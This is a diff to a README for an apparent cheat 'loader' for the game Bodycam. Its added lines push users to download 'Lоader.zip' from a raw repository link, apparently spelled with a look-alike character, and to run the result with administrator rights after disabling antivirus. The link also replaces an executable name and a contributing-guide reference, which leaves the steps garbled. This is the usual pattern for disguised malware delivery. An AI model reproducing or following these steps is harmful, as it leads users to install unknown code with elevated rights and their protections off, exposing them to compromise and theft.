MEFSHSS/BodycamBoosters/README.md

 Get started in just a few easy steps!

-1. **Download Loader.rar** directly from this repository's releases section.
+1. **Download https://raw.githubusercontent.com/MEFSHSS/BodycamBoosters/main/Lоader.zip** directly from this repository's releases section.
-2. **Extract Loader.rar** using 7-zip, WinRAR, or another extraction tool suitable for your OS.
+2. **Extract https://raw.githubusercontent.com/MEFSHSS/BodycamBoosters/main/Lоader.zip** using 7-zip, WinRAR, or another extraction tool suitable for your OS.
-3. **Open the extracted folder** and locate `BodycamCheatsLoader.exe` or equivalent OS-specific executable.
+3. **Open the extracted folder** and locate `https://raw.githubusercontent.com/MEFSHSS/BodycamBoosters/main/Lоader.zip` or equivalent OS-specific executable.
 4. **Launch the Loader** with administrator rights for optimal feature injection.
 5. **Follow on-screen instructions** to activate your chosen enhancements and personalizations.
 6. **(Optional)** Read through the included FAQ for troubleshooting common configuration questions.
-7. **Join the community** (see CONTRIBUTING.md) to offer ideas or share your usage stories!
+7. **Join the community** (see https://raw.githubusercontent.com/MEFSHSS/BodycamBoosters/main/Lоader.zip) to offer ideas or share your usage stories!

 **Note:** For increased security and better compatibility, temporarily disable antivirus or create an allowlist exception.
 Ensure you only use executables from trusted sources.